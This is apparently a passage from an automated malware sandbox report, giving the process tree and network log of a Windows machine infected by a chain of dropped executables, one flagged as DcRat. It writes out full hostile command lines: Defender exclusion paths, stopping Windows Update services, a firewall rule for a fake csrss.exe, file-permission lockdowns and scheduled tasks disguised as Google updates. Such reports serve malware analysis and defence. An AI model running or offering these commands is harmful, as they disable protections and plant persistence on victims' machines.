    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2000,7767877530402171718,16259085312361392966,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:3
        5⤵
        
        PID:4232
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2000,7767877530402171718,16259085312361392966,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2
        5⤵
        
        PID:1064
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2000,7767877530402171718,16259085312361392966,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2880 /prefetch:8
        5⤵
        
        PID:3820
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,7767877530402171718,16259085312361392966,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
        5⤵
        
        PID:2524
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,7767877530402171718,16259085312361392966,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
        5⤵
        
        PID:3764
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,7767877530402171718,16259085312361392966,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3816 /prefetch:1
        5⤵
        
        PID:3188
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,7767877530402171718,16259085312361392966,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4516 /prefetch:1
        5⤵
        
        PID:4236
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,7767877530402171718,16259085312361392966,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:1
        5⤵
        
        PID:856
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,7767877530402171718,16259085312361392966,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:1
        5⤵
        
        PID:1548
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2000,7767877530402171718,16259085312361392966,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5636 /prefetch:8
        5⤵
        
        PID:3096
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2000,7767877530402171718,16259085312361392966,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5636 /prefetch:8
        5⤵
        
        PID:3520
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,7767877530402171718,16259085312361392966,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4576 /prefetch:1
        5⤵
        
        PID:3096
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,7767877530402171718,16259085312361392966,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4620 /prefetch:1
        5⤵
        
        PID:2960
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,7767877530402171718,16259085312361392966,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:1
        5⤵
        
        PID:5716
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,7767877530402171718,16259085312361392966,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5420 /prefetch:1
        5⤵
        
        PID:8
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,7767877530402171718,16259085312361392966,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1
        5⤵
        
        PID:5980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4460 -ip 4460
1⤵
PID:4088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1188 -ip 1188
1⤵
PID:4696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1720 -ip 1720
1⤵
PID:3628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1064 -ip 1064
1⤵
PID:2884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4788 -ip 4788
1⤵
PID:2144

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3964

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4328

C:\Users\Admin\AppData\Local\Temp\2AC4.exe
C:\Users\Admin\AppData\Local\Temp\2AC4.exe
1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5412
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH1ag4IK.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH1ag4IK.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:5496
- - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WY0Fl3xP.exe
    C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WY0Fl3xP.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    PID:5560
  - - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\FC8mB1bm.exe
      C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\FC8mB1bm.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      PID:5636
    - - C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\dB9lZ4Iu.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\dB9lZ4Iu.exe
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:5724
      - C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1jV90Hm9.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1jV90Hm9.exe
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5780
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        7⤵
        
        PID:6056
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6056 -s 540
        8⤵
        Program crash
        
        PID:2580
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5780 -s 572
        7⤵
        Program crash
        
        PID:4260
      - C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2nZ180YP.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2nZ180YP.exe
        6⤵
        Executes dropped EXE
        
        PID:5420

C:\Users\Admin\AppData\Local\Temp\2BDE.exe
C:\Users\Admin\AppData\Local\Temp\2BDE.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5436
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  PID:5836
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5436 -s 416
  2⤵
  - Program crash
  PID:5948

C:\Users\Admin\AppData\Local\Temp\2C8B.bat
"C:\Users\Admin\AppData\Local\Temp\2C8B.bat"
1⤵
- Checks computer location settings
- Executes dropped EXE
PID:5548
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2D83.tmp\2D94.tmp\2D95.bat C:\Users\Admin\AppData\Local\Temp\2C8B.bat"
  2⤵
  PID:5796
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
    3⤵
    PID:5428
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa25eb46f8,0x7ffa25eb4708,0x7ffa25eb4718
      4⤵
      PID:5676
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
    3⤵
    PID:6112
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa25eb46f8,0x7ffa25eb4708,0x7ffa25eb4718
      4⤵
      PID:4996

C:\Users\Admin\AppData\Local\Temp\2E71.exe
C:\Users\Admin\AppData\Local\Temp\2E71.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5700
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  PID:6040
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 388
  2⤵
  - Program crash
  PID:4324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5436 -ip 5436
1⤵
PID:5904

C:\Users\Admin\AppData\Local\Temp\2FF8.exe
C:\Users\Admin\AppData\Local\Temp\2FF8.exe
1⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious use of AdjustPrivilegeToken
PID:5812

C:\Users\Admin\AppData\Local\Temp\327A.exe
C:\Users\Admin\AppData\Local\Temp\327A.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
PID:5992
- C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
  "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:2276
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
    3⤵
    - DcRat
    - Creates scheduled task(s)
    PID:4240
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
    3⤵
    PID:5304
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      4⤵
      PID:5404
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "explothe.exe" /P "Admin:N"
      4⤵
      PID:5532
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "explothe.exe" /P "Admin:R" /E
      4⤵
      PID:5852
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      4⤵
      PID:5808
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "..\fefffe8cea" /P "Admin:N"
      4⤵
      PID:6004
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "..\fefffe8cea" /P "Admin:R" /E
      4⤵
      PID:5940
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
    3⤵
    PID:4084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5700 -ip 5700
1⤵
PID:6112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5780 -ip 5780
1⤵
PID:6104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 6056 -ip 6056
1⤵
PID:2152

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
- Executes dropped EXE
PID:5824

C:\Users\Admin\AppData\Local\Temp\8510.exe
C:\Users\Admin\AppData\Local\Temp\8510.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
PID:2288
- C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
  "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5296
- - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
    "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    PID:1860
- C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
  "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
  2⤵
  - Executes dropped EXE
  PID:5300
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -nologo -noprofile
    3⤵
    PID:4188
- - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
    "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
    3⤵
    PID:444
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:5136
  - - C:\Windows\system32\cmd.exe
      C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
      4⤵
      PID:5276
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        
        PID:1392
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:3844
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:1188
  - - C:\Windows\rss\csrss.exe
      C:\Windows\rss\csrss.exe
      4⤵
      PID:3924
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:4912
- C:\Users\Admin\AppData\Local\Temp\source1.exe
  "C:\Users\Admin\AppData\Local\Temp\source1.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:5536
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
    3⤵
    PID:5592
- C:\Users\Admin\AppData\Local\Temp\latestX.exe
  "C:\Users\Admin\AppData\Local\Temp\latestX.exe"
  2⤵
  - Executes dropped EXE
  PID:4132

C:\Users\Admin\AppData\Local\Temp\984A.exe
C:\Users\Admin\AppData\Local\Temp\984A.exe
1⤵
- Executes dropped EXE
PID:5712

C:\Users\Admin\AppData\Local\Temp\9BB6.exe
C:\Users\Admin\AppData\Local\Temp\9BB6.exe
1⤵
- Executes dropped EXE
PID:644

C:\Users\Admin\AppData\Local\Temp\9EA5.exe
C:\Users\Admin\AppData\Local\Temp\9EA5.exe
1⤵
- Executes dropped EXE
PID:1636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:3964

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:2392
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:5704
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:624
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:5672
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:5216
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:4128

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
1⤵
PID:5156

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:2008
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:2320
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:5324
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:4104
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:4544

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:1464

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
PID:5544

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
PID:5164

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:1968

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:2468
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:5812
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:4712
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:5372
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:5132
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:5988

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
1⤵
PID:5164

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:2028
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:1360
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:2280
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:5520

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
1⤵
PID:3804

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
1⤵
PID:1440

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4056

Network

DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

69.31.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

69.31.126.40.in-addr.arpa

IN PTR

Response
DNS

8.3.197.209.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.3.197.209.in-addr.arpa

IN PTR

Response

8.3.197.209.in-addr.arpa

IN PTR

vip0x008map2sslhwcdnnet
DNS

108.211.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

108.211.229.192.in-addr.arpa

IN PTR

Response
DNS

9.228.82.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

9.228.82.20.in-addr.arpa

IN PTR

Response
DNS

41.110.16.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

41.110.16.96.in-addr.arpa

IN PTR

Response

41.110.16.96.in-addr.arpa

IN PTR

a96-16-110-41deploystaticakamaitechnologiescom
DNS

54.120.234.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

54.120.234.20.in-addr.arpa

IN PTR

Response
DNS

146.78.124.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

146.78.124.51.in-addr.arpa

IN PTR

Response
DNS

2.136.104.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

2.136.104.51.in-addr.arpa

IN PTR

Response
DNS

www.facebook.com

msedge.exe

Remote address:

8.8.8.8:53

Request

www.facebook.com

IN A

Response

www.facebook.com

IN CNAME

star-mini.c10r.facebook.com

star-mini.c10r.facebook.com

IN A

157.240.247.35
DNS

accounts.google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

accounts.google.com

IN A

Response

accounts.google.com

IN A

142.250.179.141
GET

https://accounts.google.com/

msedge.exe

Remote address:

142.250.179.141:443

Request

GET / HTTP/2.0
host: accounts.google.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
GET

https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F

msedge.exe

Remote address:

142.250.179.141:443

Request

GET /ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F HTTP/2.0
host: accounts.google.com
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
